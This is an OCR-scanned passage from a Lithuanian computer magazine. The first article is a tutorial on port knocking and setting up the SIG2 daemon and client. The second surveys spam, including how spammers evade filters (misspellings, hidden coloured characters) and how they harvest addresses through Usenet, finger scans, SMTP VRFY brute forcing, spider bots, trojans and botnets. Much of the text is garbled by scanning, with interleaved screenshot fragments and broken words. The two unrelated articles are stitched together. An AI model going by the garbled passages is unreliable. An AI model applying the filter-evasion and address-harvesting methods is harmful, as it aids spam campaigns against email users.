£4 „pasibeldimą“ („tuk tuk!“) gali reaguoti visiškai skirtingai ir ne 
tik dinamiškai keisti ugniasienės taisykles, tačiau atlikti ir bet 
kokius kitus administravimo veiksmus (tarkim, perkrauti siste- 
mą, atjungti maitinimą ir panašiai). Kalbant apie patį pasibel- 
dimą, tai jis laisvai konfigūruojamas ir priklauso išskirtinai nuo 
sistemą konfigūruojančio žmogaus. Vienintelė sąlyga — prisi- 
jungimų seka (arba jos sudarymo algoritmas) turi būt iš anksto 
žinomas tiek serveriui, tiek ir klientui. 


[Keturi žingsniai link laimės] Dabar, kai tu jau supratai šios 
technologijos esmę, siūlau į ją žvilgtelėti iš vidaus (žr. į viršuje 
pateiktą schemą). Salyginai Port Knocking veikimą galima su- 
skaidyti į 4 žingsnius, kurie pavaizduoti paveikslėliuose. Pilkas 
trikampis yra serveris, simpatiški kvadratėliai simbolizuoja kon- 
krečias jungtis. o punktyrinės linijos — kliento prisijungimus. 

Pirmasis žingsnis. Serveryje veikia ugniasienė, kuri blokuoja 
prisijungimus į bet kokią jungtį. Klientas A bando prisijungti prie 
jungties N, tačiau nesėkmingai. Ta pati bėda ištinka ir klientą B. 
Antrasis žingsnis. Klientas iš anksto žinoma tvarka bando 
prisijungti prie jungčių 1, 2, 3, 4. Šioje prisijungimų sekoje už- 
šifruotas specialus pranešimas, kuris serveriui yra iš anksto ži- 
nomas. Klientas žino, kad po prisijungimų bandymų serijos ser- 
veryje bus atliktas tam tikras veiksmas, tačiau jungimosi metu 
Jis iš serverio negauna jokio atsakymo. Taip yra todėl, kad ug- 


IGLIENT) 


niasienės taisyklėse uždrausta reaguoti į kokius nors bandymus 
jungtis. 

Trečiasis žingsnis. Keistoje kliento elgsenoje (netvarkingi ban- 
dymai jungtis į skirtingas jungtis), kuri užregistruojama ugnia- 
sienės loguose, Port Knocking demonas atpažįsta pranešimą 
(„tuk tuk!“) Ir jį interpretuoja. Šiuo konkrečiu atveju Jis klientui 
atidaro jungtį N. R 

Ketvirtasis žingsnis. Šiek tiek palaukęs, kad serveris suspėtų 
sureaguoti į Knock pranešimą, klientas dar kartą bando jungtis 
į jungtį N ir... o stebukle! Nepaisant to, kad jungtis dar visai 
neseniai buvo uždaryta, prisijungti pavyko! 


[Gilinamės į detales] Kaip tu jau galėjai pastebėti, Port Knoc- 
king mechanizme vieną iš pagrindinių vaidmenų atlieka ugnia- 
sienė. Unix realizacijų atveju Port Knocking demonas yra tik pa- 
žangus logų analizatorius. Iš jo viso labo reikalaujama be per- 
traukos stebėti ugniasienės logų pasikeitimus ir klientų bandy- 
muose jungtis atpažinti Knock pranešimus. Ugniasienė visiškai 
susitvarko su tinklo paketais Ir juos apdoroja, todėl reikia bent 
jau bendrais bruožais nusimanyti ugniasienės veikimo ir apskri- 
tai tinklo susijungimo užmezgimo mechanizme. 

Šiaip tai susijungimo procesas TCP protokolu vyksta trimis eta- 
pais: 

1. Klientas serveriui išsiunčia paketą su specialia vėliavėle, kuri 
vadinasi SYN. Tokia vėliavėlė parodo, kad klientas nori užmegzti 
susijungimą. 

2. Atsakydamas į kliento užklausą, serveris išsiunčia paketą, 
kuriame yra ta pati SYN ir papildoma ACK vėliavėlė, kuri reiškia, 
kad serveris priėmė susijungimo užklausą ir laukia iš kliento 
susijungimo užmezgimo patvirtinimo. 

3. Klientas, gavęs paketą su SYN ir ACK vėliavėlėmis, serveriu 
išsiunčia paketą tik su ACK vėliavėle. Tai reiškia, kad susijungj- 
mas užmegztas sėkmingai. 


Jeigu serveryje idiegta ugniasienė, tai antrasis punktas šiek tiek 
keičiasi. Vos tik ugniasienė iš kliento gauna paketą su SYN vė- 
liavėle, ji jį apdoroja, t.y. nuskaito paketo parametrus ir sulygina 
Juos su aprašytomis taisyklėmis, po ko paskelbiamas nuosp- 
rendis. Jeigu nė viena taisyklė tokio paketo neleidžia priimti, jis 
atmetamas, o susijungimas nutraukiamas arba atmetamas. Tai 
subtilus niuansas: atsakomoji ugniasienės reakcija priklauso nuo 
jos nustatymų. 
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Aptarkime visa tai remdamiesi Linux ipchains pavyzdžiu, kadan- 
Ei šį įrankį lengviausia suprasti. Ši ugniasienė į konkrečią jungtį 
pasiustą paketą gali arba priimti (ACCEPT), arba atmesti (RE- 
JECT), arba ignoruoti (DENY). Manau, kad pirmoji reakcija visiš- 
kai aiški, tačiau kuo skiriasi dvi paskutinės? Abiem atvejais ad- 
resato jungtis laikoma uždara, t.y. prie jos negalima prisijungti. 
Jeigu prisijungimas į jungtį atmetamas su REJECT, tuomet ser- 
veris klientui grąžina ICMP klaidą su pranešimu apie tai, kad 
susijungimas atmestas. Klientui (tiksliau šnekant, jungčių ske- 
neriui) tampa aišku, kad ugniasienė blokuoja prisijungimą, ta- 
čiau per šią jungtį gali veikti koks nors servisas. O tada, kai 
susijungimas atmetamas su DENY, kliento bandymas jungtis 
nesukelia jokios reakcijos. Taip išeina, kad per šią jungtį iš es- 
mės neveikia joks servisas. Supratai skirtumą? Skirtingas varia- 
cijas pateikiau iškarpoje. Rekomenduočiau jas peržiūrėti. 


[Konkrečios realizacijos] Egzistuoja pakankamai daug Port 
Knocking technologijos realizacijų. Ji naudojama trojanuose, fin- 
gerprint įrankiuose ir tiesiog administravimo programose, ku- 
rios leidžia prisijungti prie serverio per iš išorės su ugnlasiene 
uždarytą jungtį. Kaip pavyzdį paimkime programą, kuri priskiria- 
ma pastarajam tipui ir vadinasi SIG2 (www.security.org.sg/co- 
de/portknock1.html). Kodėl aš ją pasirinkau? Ogi todėl, kad tai 
viena iš nedaugelio realizacijų, kurios serverinė dalis skirta tiek 
UNIX, tiek ir Windows sistemoms. Kalbant apie kitas realizaci- 
jas, rekomenduočiau žvilgtelėti į svetainę www.portknocking.org/ 
view/implementations. Dar daugiau, geriausias jų aš išskyriau 
prie šio straipsnio pridėtoje išnašoje. 

Klientinė ir serverinė SIG2 dalys platinamos kartu su išeities 
tekstais dviejuose archyvuose: sig2knockd-0.2.zip ir sig2knocko- 
0.2.zip, kuriuos galima parsisiųsti iš oficialios programos sve- 
tainės arba pasiimti iš mūsų žurnalo CD. Savaime suprantama, 
mums prireiks tiek vieno, tiek kito. Pradėsime nuo serverinės 
dalies konfigūravimo. 

1. Pirmas dalykas, kurį reikia padaryti, — išpakuoti archyvą 
sig2knockd-0.2.zip ir Release katalogo turinį perkelti į iš anks- 
to paruoštą katalogą, pavyzdžiui, c:|PortKnock. Be to, reikia pa- 
sirūpinti šviežia WinPcap (www.winpcap.org) tvarkyklės versija. 
Jeigu tu jos savo sistemoje dar nesi idiegęs, padaryk tai dabar. 
Priešingu atveju SIG2 neveiks. 

2. Dabar, kai programos vykdomos bylos yra reikiamame kata- 
loge, galima pradėti konfigūravimą. SIG2 yra konsolinė progra- 
ma, todėl demonas konfigūruojamas su tekstiniais konfigais. 
Informacija apie vartotojus saugoma byloje user.txt. Sintaksė 
labai paprasta: kiekvienoje eilutėje įvedami dvitaškiu atskirti šie 
duomenys: vartotojo vardas, jo slaptažodžio hešas ir įrašo su- 
kūrimo laikas. Savaime suprantama, rankiniu būdu generuoti 
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3IG2 konfigūracinė byla — sig2knockd.conf 


įrašo nereikės -— tam su programa pateikiamas specialus įran- 
kis sig2knockd useradd.exe. Tiesiog jį paleisk ir įvesk vartotojo 
vardą bei slaptažodį. Taip tu gausi reikiamą eilutę, kuri bus pa- 
naši į 
step:LpV + ulhAw/CO031YHcV9MVO = =:1099864780. 

Ją be pakeitimų reikia pridėti į bylą user.txt ir išsaugoti. Reko- 
menduoju iš karto sukonfigūruoti priėjimo prie šios bylos tei- 
ses, kad paprasti vartotojai negalėtų jos atidaryti. Taip sakant, 
saugumo sumetimais. 


3. Priėjome prie pagrindinės konfigūracinės bylos — 
sig2knockd.conf. Veikiančio konfigo pavyzdys pagal nutylėjimą 
pateikiamas su programa, tačiau aš apie viską papasakosiu 
išsamiau. Viso byloje nurodomi 4 parametrai: UDP PORT, FOR- 
WARD TO IP, FORWARD TO PORT, SINGLECONN PORTO- 
PEN TIME. 

Pirmasis parametras — UDP PORT — parodo specialią identi- 
fikacinę UDP jungtį. Šioje Port Knocking realizacijoje jis reikalin- 
gas norint pradėti vartotojo autorizacijos procesą. Įsimink šį pa- 
rametrą — jo prireiks jungiantis prie serverio. Tegu jis bus lygus 
1001. 

Antrasis ir trečiasis parametrai FORWARD TO IP ir FOR- 
WARD TO PORT — parodo IP adresą ir jungti, į kuriuos sėk- 
mingos Knock sekos apdorojimo atveju arba, kitaip tariant, po 
autorizacijos, bus nukreipiami paketai. Pabandysime lokalioje 
mašinoje (vietoje IP nurodysime 127.0.0.1) atidaryti priėjima 
prie FTP serverio (21 jungtis). 

Su ketvirtuoju parametru — SINGLECONN PORTOPEN TIME — 
sekundėmis nurodoma, kiek laiko jungtis bus atidaryta. 
Konfigūravimas baigtas. Dabar galima pradėti testuoti: tam į 
sistemą prisijunk administratoriaus vardu ir komandinėje eilu- 
tėje paleisk bylą sig2knockd.exe. Tau bus pateikta informacija, 
jog programai reikia nurodyti tinklo sąsają. | ekraną taip pat bus 
išvestas visų tinklo jungčių sąrašas. Iš jų išsirink sąsaja, nu- 
kreiptą į lokalaus tinklo arba interneto pusę (priklausomai nuo 
to, iš kur bus jungiamasi), įsidėmėk jo numerį ir paleisk progra- 
mą su raktu sig2knockd -i <sąsajos numeris>. Tai daroma 
maždaug taip: C:|PortKnock>sig2knockd -i 3. 

Tokias programas patogiau paleisti kaip servisus, kad jos Ir kon- 
soliniai langai nesimaišytų po akimis. Tai padaryti nesudėtinga: 
paleidžiant tereikia nurodyti raktą -s. 

Viskas. Dabar Port Knocking demonas paleistas ir paruoštas 
darbui. Sėkmingos autorizacijos atveju jis atidarys atsitiktinę jung- 
tį, iš kurios paketai bus nukreipiami į lokalios mašinos FTP ser- 
visą. Pats metas pabandyti prie jo prisijungti. Klientinė SIG2 
dalis platinama vienos vienintelės bylos (sig2knockc.exe) pavi- 
dalu. Visi reikiami parametrai įvedami komandinėje eilutėje ir 
interaktwiame režime, todėl konfigūravimo byla čia nereikalin- 
ga. Bendra įrankio paleidimo sintaksė tokia: 

sig2knockc.exe <serverio |P> <valdantis serverio UDP portas> 


Tu pameni, kokią UDP jungtį mes nurodėme serverio nustaty- 
muose? Būtent čia ji ir reikalinga. Tai reiškia, kad klientą reikia 
paleisti štai taip: sig2knockc.exe 192.0.0.2 1001. 

Po paleidimo programa paprašys įvesti vartotojo vardą ir slapta- 
žodį. Vos tik visi reikiami duomenys bus įvesti, programa suda- 
rys Knock seką ir įvykdys reikiamus prisijungimo prie serverio 


jungčių bandymus. Šį procesą 
palydės tokio tipo pranešimai: 
Knock? (1 — Port = 2152, ISN 
= 69151B7F) 

Knock? (2 — Port = 65060, 
ISN = 7F154085) 

Knock? (3 — Port = 21070, 
ISN = 1D66E6E8) 
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Jeigu vartotojo vardas ir slap- 
tažodis buvo įvesti teisingai, la- 
bai greitai tu gausi tokį prane- 
šimą: Door is open at 
192.168.0.2 Port 47189 for 
30 seconds. Pabandykime prie 
Jos prisijungti su telnet'u:, 


telnat 192.168.0.1 47189 


Eai2 o e laase is igžknecko ex8 192.168.0.2 1001 
ockC Version 0.2 Gopynight <c> 2004 SIG“2 <Kuww.security.or 
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ending knock seguences with source address 192.168.0.1 
sing timnestamp value 1099906347 


ock? <1 - Port = 21493, 
ock? <2 - Port = 19310, 
ock? <3 - Port = 55258. ISN = 31028C69) 
n I come in? Waiting for response. 

is open at 192.168.0.2 
28, 27, 26, 25 
8. 7,6, 5, 4, 3 


:NTempNSRe lease >README .w32 


ISN = C605EA69) 
ISN = 6490DCP4) 


Port 39732 for 30 seconds. 
23, 22, 21, 20, 19, 18, 17, 16, 15, 14 


„2,1, 


Kllento mašina sėkmingai identifikuota. Serveris atpažino Knock seką, todel nutolusioje mašinoje 30 sekundžių bus atdaryta 


Ir gauname FTP demono ba- 
nerį — „Gene6 FTP Server 
v3.6.0 (Build 23) ready...“. Valio, mes iš tiesų nukreipti į mums 
reikalingą jungtį! 

Lieka dar vienas klausimas: o kaip gi pasielgti su ugniasiene, 
kokiu būdu galima uždaryti jungtis? SIG2 sukurtas glaudžiai in- 
tegracijai su ugniasiene pktfilter (wvw.hsc.fr/ressources/outils/ 
pktfilter/download/). Tai banalus paketų filtras, kuris veikia pa- 
našiai kaip *nix'inės ugniasienės ir turi tekstinį konfigą. Čia pro- 
blemų iškilti neturėtų. 


Jungtis 39732 


[„Port Knocking“ privalumai] Paslėptas identifikacijos ir duo- 
menų perdavimo į serveri metodas, kuomet išorėje nėra atvi- 
rų jungčių — vienas iš pagrindinių technologijos privalumų. 
Nėra jokių būdų, kurie galėtų nustatyti, ar nutolusioje mašino- 
Je aktwi Port Knocking sistema. Skirtingų kombinacijų perrin- 
kimo idėja — tikrų tikriausi kliedesiai. Dar daugiau, kiekvieną 
tokią ataką pastebės bet kokia bent kiek veikianti IDS ir paty- 
ręs sistemos logus peržiūrintis administratorius. 

Kaip žinia, skirtingų servisų ir net apsaugoto SSH slaptažodžius 
galima perimti su sniferiu. Tačiau naudojant Port Knocking infor- 
macija perduodama bandymų jungtis į uždaras jungtis serijomis, 0 
ne įprastiniais tinklo paketais. Dėl to nežinant, kokia būtent siste- 
ma naudojama šio metodo realizacijai bei pačių sistemos vidurių, 
perimti (o tiksliau — teisingai interpretuoti) privačius duomenis 
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User Nano: step 
Paššvord: 


the folleuiny line to the usex account Filo. 
piLpt+užiiu/08031YHcUJMO=:8 


+ Part Knock) 


Sukuiiame vartotojo step sisteminį įrašą. Gautą eilutę reikia įterpti | bylą User:bt: 


visiškai neįmanoma. Siekiant dar labiau sumažinti informacijos 
perėmimo riziką, perdavimo metūl duomenis tarp serverio bei kliento. 
galima koduoti ir perdavinėti šifruotu pavidalu. Svarbu pastebėti, 
kad šifravimą pripažįsta daugelis Port Knocking technologijos reali- 
zacijų. 

Unix sistemose technologijos integravimas atliekamas akimirks- 
niu. Čia Aereikia įdieginėti naujų tvarkyklių, gudrių ugniasienių ir 
panašiai. Port Knocking galima sukonfigūruoti darbui su esama 
ugniasiene ir tam praktiškai nereikia jokių sąnaudų. 


[Neapsieita be trūkumų] Nereikia manyti, kad Port Knocking 
tai panacėja nuo visų bėdų. Norint užmegzti tokio tipo susijungį- 
mą, serverinė ir klientinė dalys turi žinoti vienodą Knock seką. 
Sekos sudarymo algoritmas ir reikiami duomenys dažnai saugo- 
mi kietajame diske. Trumpai priėjus prie mašinos, šią informaci- 
ją galima išgauti ir po to panaudoti klastingais tikslais. Saugiau- 
siais variantais laikomos tos klientų realizacijos, kurios Knock raktus 
saugo šifruotu pavidalu flash kortelėse (taip gaunamas savotiš- 
kas USB raktas) bei kurios saugo vartotojų sisteminius įrašus 
(kaip ir aptartu SIG2 atveju). 

Kad darbas su technologija būtų patogus, naudojamų jungčių 
seka turėtų būti pakankamai ilga. Tai būtinai lems suvartojamo 
tinklo srauto padidėjimą ir kanalo apkrovimą, kas, savaime su- 
prantama, nėra labai gerai. 

Absoliuti realizacijų dauguma be ugniasienės yra bejėgė, ka- 
dangi negali dirbti tiesiogiai su tinklo paketais, 0 tik apdoroja 
ugniasienės logus ir priklausomai nuo Knock sekos atitinkamai 
koreguoja jos konfigus. Tai blogai, tačiau iš čia išplaukia ir dar 
vienas trūkumas. Jeigu sutriks Port Knocking demono darbas, 
jis tau gali kaip reikiant sugadinti gyvenimą, sudarkydamas ug- 
niasienės konfigūraciją. Visai įmanomas ir toks atvejis, kuomet 
visos jungtys bus užblokuotos, 0 per atstumą prie jų prisijungti 
bus neįmanoma. 

Port Knocking realizacijai žemame lygyje atitinkamas funkcijas 
reikia integruoti į ugniasienę ir paketų filtrus. Būtent dėl to prak- 
tiškai nėra Windows sistemoms skirtų šios technologijos reali- 
zacijų, Kai tuo metu Linux ir BSD sistemoms, kurios pagal nuty- 
lėjimą turi geras ugniasienes, jų sukurta milijonai. 
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E Spamo antologija 
Spameriams naudingos technologijos 
POTO, KAI AŠ KIEKVIENĄ DIENĄ IŠ SAVO PA- 
STO DĖŽUČIŲ IŠMĖŽIU PO 200 LAIŠKŲ RE- 
ra KLAMINIO SLAMSTO, MAN PRADEDA ATRO- 
ž DYTI, KAD JIEMS NUMATOMOS PERNELYG 
5 SVELNIOS BAUSMES. SPAMAS TAPO TIKRU 
8 XXI AMŽIAUS MARL. IR JEIGU PER ARTIMIAU- 
SIUS KELERIUS METUS SPECIALISTAI NESU- 
GALVOS EFEKTYVAUS KOVOS SU JUO BŪ- 
ž DO, INTERNETO LAUKIA NIŪRŪS LAIKAI. 
a 


[Kova su spamu] Jungtinėse Valstijose spamo siunti- 
nėjimas pažeidžia praktiškai visų interneto ryšio tiekėjų 
susitarimą su vartotoju, dėl ko šis gali būti atjungtas. 
Taip pat Amerikoje nuo 2003 metų gruodžio galioja CAN- 
SPAM Act, kuriame aprašyti komercinių pranešimų siun- 
tinėjimo standartai ir apribojimai. Jeigu tu ruošiesi Užsi- 
imti tokiu siuntinėjimu, privalai gauti Federalinės preky- 
bos komisijos leidimą. Vis dėlto specialistai šį aktą lai- 
ko neefektyviu ir net priskyrė jam naują pavadinimą: 
You CAN-SPAM (tu gali spaminti). Per pastaruosius me- 
tus spamo mastai tapo bauginantys, todėl į kovą su juo 
stojo daugelis stambių kompanijų, taip pat ir „Google“ 
bei „Microsoft“. Vienoje spaudos konferencijų Bilas Geit- 
sas spamą pažadėjo išnaikinti per du metus, nors ko! 
kas dar neaišku, kaip tai bus padaryta. Dabar „Micro- 
soft“ užsiima pagrindinių spamo šaltinių paieška ir ko- 
voja su jais teisine tvarka, Savotiškai prie spamo pliti- 
mo prisideda ir interneto paslaugų tiekėjai, per kuriuos 
praeina didelė reklaminio srauto dalis, tačiau jie mažai 
ka gali padaryti. Taip, yra tam skirtų filtrų, tačiau dauge- 
lio spamo Jie nesulaiko, 0 jeigu atrinkimo kriterijai būtų 
griežtesni, tai kartu su šiukšlėmis būtų šalinami ir įpras- 
tiniai laiškai, kas daugeliui vartotojų yra daug blogiau, 
nei kasdien trinti po 200 reklaminių pranešimų. 
Specialiai kovai su spameriais buvo sukurta captcha sis- 
tema. Kadangi didesnio žinučių kiekio išsiuntimui 90 
aisiais spameriui reikėjo turėti krūvą pašto dėžučių, jos 
buvo urmu registruojamos nemokamas elektroninio pa- 
što paslaugas teikiančiuose serveriuose. Šis procesas 
buvo automatinis. 1997 metais Andrejus Broderis pa- 
siūlė būdą, užkertantį kelią automatinei registracijai. Už- 
pildant anketą puslapyje buvo pateikiamas paveikslė- 
lis, kuriame būdavo pavaizduota atsitiktinė skaičių ir rai- 
džių seka. Norėdamas pratęsti registraciją, vartotojas 
privalėjo įvesti šią seką. Kadangi tai yra paveikslėlis, 
kompiuteris negali atpažinti skaičių ir raidžių, tai pada- 
ryti gali tik žmogus. 
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Siekdamos visiškai išnaikinti spamą, kai kurios kompanijos (taip 
pat ir „Microsoft“) siūlo įvesti mokestį už kiekvieno pranešimo 
išsiuntimą. Privatiems asmenims jis būtų simbolinis, tačiau mi- 
lijonus laiškų siunčiantiems spameriams tai būtų įspūdinga su- 
ma. Gaunasi kažkas panašaus į pašto ženklus. Tačiau žiūnnt iš 
kitos pusės, jeigu jau dabar spameriai laiškų siuntinėjimui pa- 
naudoja kitų vartotojų kompiuterius, niekas jiems nesukliudys 
mokėjimą už pranešimų siuntimą pavesti tiems patiems varto- 
tojams. 

Kol kas efektyviausiu sprendimu lieka antispamo filtrai. Norė- 
dami juos apeiti, spameriai imasi įvairiausių triukų, pavyzdžiui, 
pakeičia juoduosiuose sąrašuose esančius žodžius. Taip žodis 
„porn“ gali būti pakeistas į „pron“. Filtras apgaulės nesupras, o 
žmogus tokį žodelį perskaitys būtent taip, kaip reikia. Žodis taip 
pat gali būti užrašytas atskiriant raides tarpais: „p o m“. HTML 
panaudojimas žinutėse spameriams suteikia dar didesnių gali- 
mybių. Pavyzdžiui, jeigu žodyje tarp raidžių įterptume simbolius, 
kurie nuspalvinti fono spalva, žmogus jų nepamatys, o kompiu- 
teris, kuris nereaguoja į spalvas, nesugebės perskaityti taip Iš- 
darkyto teksto. Spameriai savo ginkluotę pasitelkei ir captcha 
idėjas, į savo pranešimus įterpdami paveikslėlius su tekstu, ku- 
rį atpažinti filtrai nėra pajėgūs. Pastaruoju metu taip pat alsira- 
do intelektualus spamas, kuriame be įkyrios reklamos galima 
rasti knygų citatų ir eilėraščių fragmentų. Tai vėlgi panaudojama 


siekiant išmušti iš vėžių filtrus, kurie nustato žodžių aktualumą 
laiškuose. Siuntėjo adresas taip pat apdorojamas: spameriai į 
From eilutę įterpia automatiškai sugeneruotus vardus (pavyz- 
džiui, John B. Slater) ir dažnai naudoja gavėjo domeną. Pavyz- 
džiui, aš dažnai gaunu laiškus iš neva mano organizacijos ser- 
veryje pašto dėžutes turinčių žmonių. 

1997 metais Adamas Bekas pristatė naują kovai su spamu ir 
DoS atakomis skirtą sistemą Hashcash. Jos idėja ta, kad siun- 
tėjas antraštėje įterpia eilutę, kuri parodo, jog jis laiško siunti- 
mui sunaudojo tam tikrą laiką, pavyzdžiui, sprendė paprastą 
užduotį. Savaime suprantama, jog spameriai negali sau leisti 
kiekvienam laiškui skirti nė kelių sekundžių, todėl hashcash ga- 
rantuoja, kad laiškai su išganingaja eilute nėra spamas. 
Visiškai išvengti spamo savo pašto dėžutėje galima dvejopai. 
Pirmasis — niekur intemete nepublikuoti tokio pašto adreso. 
Net jeigu jis pakeistas (jonas[at/serveris.lt), ištobulinti spame- 
nu botai jį galį atpažinti ir įtraukti į savo bazę. Antrasis būdas 
sukonfigūruoti filtrą, kuris blokuoja kiekvieną gaunamą praneši- 
mą, tačiau siuntėjui išsiunčia laišką su pasiūlymu patvirtinti siun- 
timą, nuspaudžiant tam tikrą nuorodą. Po to šis žmogus bus 
įtrauktas į baltąjį sąrašą, todėl visi kiti jo laiškai sėkmingai pa- 
sieks gavėją. 


[Elektroninio pašto adresų bazės pirkimas] Šis būdas pats 
paprasčiausias, jį paprastai naudoja naujokėliai arba nedidelės 
spamerių kompanijos. Daugelyje šalių elektroninių adresų par- 
davimas neteisėtas, tačiau yra ir tokių šalių, kur tai neuždraus- 
ta. Pardavėjai kompaktinius diskus su adresų bazėmis rekla- 
muoja būtent tokiose šalyse esančiuose serveriuose. Kiekvie- 
name diske paprastai būna apie milijonas patikrintų adresų, o 
jo kaina svyruoja apie 50 dolerių. Jį užsisakyti galima paštu 
arba parsisiųsti iš tokios svetainės, prieš tai apmokėjus pirkinį. 
Spamerių bazės būna specializuotos ir bendros. Specializuotos 
kainuoja kur kas brangiau, kadangi jose esantys adresai yra 
surūšiuoti ir įtraukti tik tie, kas potencialiai suinteresuoti rekla- 
muojama preke. 


[Registracija USENET konferencijose] USENET spameriams yra 
gardus kąsnelis, kadangi visi tokių konferencijų dalyviai kartu su siun- 
čiamais pranešimais viešai publikuoja ir savo pašto adresą. Pakan- 


Ž 


0 ži9S bri Dei ind Deveko 


spamerių programa 


ka užsiregistruoti pačio- 
se populiariausiose kon- 
ferencijose ir paleisti pro- 
gramą, kuri iš tekstinių 
bylų automatiškai suren- 
ka adresus. Taip pat ga- 
lima apdoroti ir Google 
Graups konferencijas bei 
skirtingas populiarias 
naujienų grupes. 


[Tinklo mazgų skena- 
vimas] Kai kurie su 
UNIX susipažinę spa- 
meriai serverių Su pa- 
leistu finger servisu pa- 
ieškai panaudoja jungčių skenerius. Kaip žinia, komanda finger 
*nix sistemoje pateikia išsamią informaciją apie į sistema pri- 
sijungusius vartotojus. Egzistuoja tokios programos, kurios au- 
tomatiškai atnaujina užklausą apie vartotojus ir sujungia gautą 
informaciją (paprastai pakanka žinoti užregistruota vardą) su 
serverio domeno vardu, dėl ko gaunami realūs adresai. 


[Adresų surinkimas ir išsiuntinėjimas] 

Norint išsiųsti milijonus pranešimų, reikia gauti milijonus 
adresų. Spameriai tai daro skirtingais būdais. 
Išsiuntinėdami pranešimus spameriai laikosi trijų taisyklių: 
anonimiškumas, pigumas ir sudėtingas susekimas. 90-ai- 
siais, norėdami išvengti atjungimo nuo tiekėjo ir paslėpti 
savo adresą, spameriai dirbo per open mail relay serverius, 
kurie leisdavo siųsti kam nori ir ką nori. Po to tokie serveriai 
tapo retenybe, o spameriai perėjo prie proxy serverių pa- 
naudojimo, kurie būdavo keičiami kaip kojinės (beje, ir savų 
tiekėjų). Neblogu spamerio pagalbininku taip pat tapo CGI 
skriptas FormMail.pl, leidžiantis per svetainėje esančią HTML 
formą siųsti atsiliepimus į pašto dėžutę. Egzistuoja tokios 
programos, kurios gavėjo adresą pakoreguoja taip, kad spa- 
merio „atsiliepimą“ gautų ne tik svetainės autorius, bet ir 
tūkstančiai žmonių. Neretai spameriai sukuria nuosavus pa- 
što serverius su dinaminiu dia-up prisijungimu. Po kiekvie- 
no prisijungimo tokiam serveriui išskiriamas naujas IP adre- 
sas, kas apsunkina teisėsaugos organų darbą. Tiesa, stam- 
būs interneto paslaugos tiekėjai dabar naikina tokius serve- 
rius, kadangi daugelio pašto dialup serverių savininkai yra 
spameriai. 

Spamas tapo populiarus, kadangi tai pati pigiausia rekla- 
mos rūšis. Nepaisant to, kad 99.996 gavėjų reklaminį pra- 
nešimą tuojau pat pašalina, visada lieka 0,196 žmonių, 
kurie jį atidžiai perskaito ir užkimba ant pasiūlymo. Šis pro- 
centas atperka visas siuntinėjimui skirtas išlaidas. Beje, 
visa tai neapsiriboja vien tik elektroniniu paštu siuntinėja- 
mu spamu. Spamerių aukomis gali tapti bet kurie popu- 
liarūs vieši servisai, pradedant ICO tipo pokalbių progra- 
momis ir baigiant web-blog'ais. Jau ne retenybė ir mobi- 
lusis spamas, kuomet SMS pranešimai su reklama varto- 
tojams išsiunčiami per specializuotas interneto svetaines. 
0 netolimoje ateityje galima tikėtis ir spamo VolP (IP tele- 
fonija) tinklais. 
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06 


a, Jau paminėti SPAM konserva 


Ieška panaudojant brutiorsą 


ĮKetvirtasis būdas: brutforsinimas.] Technologija panaši į 
laptažodžio parinkimą pagal žodyną, tik šiuo atveju parenka- 
mas ne slaptažodis, 0 realios stambioje pašto sistemoje regist- 
ruotos pašto dėžutės. SMTP protokolas leidžia nesiunčiant pra- 
mo patikrinti užklausiamos pašto dėžutės egzistavimą (su 
(omanda VERIFY). Spameriui tereikia ant dažniausiai naudoja 
mų vardų (alex, mike, john ir tt.) užsiundyti specialią programą, 
kuri juos pavers adresais su pridėta eta (0) ir domeno pavadi- 
nimu, 0 po to automatiškai patikrins, kurie iš jų veikiantys. Ka- 
populiariais pašto servisais (pavyzdžiui, mail.ru, hot- 
box.com, aol.com) naudojasi milijonai žmonių, praktiškai bet 
koks žodis yra kokio nors vartotojo vardas. Aktyvūs adresai bus 
šsiųsti spameriui ir įtraukti į bendrą bazę. 


ne: 


[Spambotai] Labai populiarus metodas yra pasinaudoti spe- 
cialiomis programomis „vorais“, kurios naršo po svetainės ir ieško 
išganingųjų žodžių su (0 ženkleliu. Kadangi vartotojai forumuo- 
se ir svečių knygose dažnai palieka savo realius pašto adresus, 


O milijardų pra- 
nešim 
* 9096 pasaulinio sp 
tinėjimas 
ių Meka yra JAV (ypač Florida), iš kur išsiunčiam 
pagrindi S reklamos dalis. Antroji V itenka Kinijai 
* Populiariausia spamo rūšis yra greitai praturtėti siūlanty 
laiškai (3796). Po jų eina pornografinio pobūdžio reklama 
(2594) aminės įrangos pasiūlymai (1894) ir nuorod, 
web pi (696) 
Imeriu, kuris buvo nuteisi 
rdas Karmakas, kuris 2003 mei 


vo dalies sudaro 150 spamerių siun- 


tėmimu, 


juntinėjo 825 


tapo Hov 
milijonus reklaminių pranešimų. K 


mas tuo metu da 
vimą ir paskyrė 


mo nelegalumo įs 
nuteisė už dokumentų falsifik 
įmanomą bausmę — 7 metus. 


spamenių sąrašas 


per dieną vieno tokio „voriuko“ derlius gali siekti šimtus tūks: 
tančių adresų. Šio metodo trūkumas yra tas, kad daugelis taip 
gautų adresų seniai nenaudojami, todėl tenka prieš tai kiekvie- 
ną jų patikrinti. Neretai tokių programų efektyvumas padidina- 
mas užsiundant jas ant komercinių arba specializuotų svetai 
nių. Kadangi daugelis kompanijų savo svetainėse publikuoja in 
formaciją apie savo darbuotojus ir jų kontaktus, tai spameriams 
duoda tūkstančius veikiančių adresu. 


[Virusai ir kirminai] Ko gero, pats efektyviausias būdas, kurį 
spameriai pradėjo naudoti ne taip seniai. Yra spamerių, kurie 
parazituoja svetimuose virusuose, 0 pažangesni jaunuoliai pa: 
tys juos kuria ir platina. Pirmosios kategorijos atstovai tokiais 
virusais, kaip SoBig ir MiMail, užkrėstų mašinų ieško skenuo: 
dami jungtis, po ko pasinaudoja atvira skyle ir palieka sistemo- 
je trojaną. Šis kopijuoja visus įdiegtoje pašto programoje suras- 
tus adresus ir išsiunčia juos nurodytu spamerio adresu. Kom 
piuteriniai kirminai dažniausiai panaudojami ne adresams su- 
tinkti, o botų tinklams sukurti iš mašinų-zombių. Tokiu atveju 
reklaminį šlamštą siuntinės jau ne pats spameris, 0 paprasti 
vartotojai, kurių kompiuteriai gauna instrukcijas iš spamerio ser- 
verio ir siuntinėja spamą kitiems vartotojams. Per vieną tokį 
kompiuterį-z0mbį per savaitę gali praeiti milijonai laiškų, tuo 
pačiu garantuojant spamerio saugumą. 

Svarbi spamerių darbo dalis yra patikrinimas, ar vartotojas gavo 
reklamą. Paprasčiausias būdas — į elektroninį laišką įdėti eilu- 


tę Return-Receipt-To: spammerDspam.net, kuri pristatys pra 
nešimą, jog žinutė gauta. Tiesa, tai veikia ne visose pašto pro- 
gramose, o kai kurie nustatymuose atjungia tokių pranešimų 
siuntimo opciją. Kitas būdas — priversti vartotoją savarankiškai 
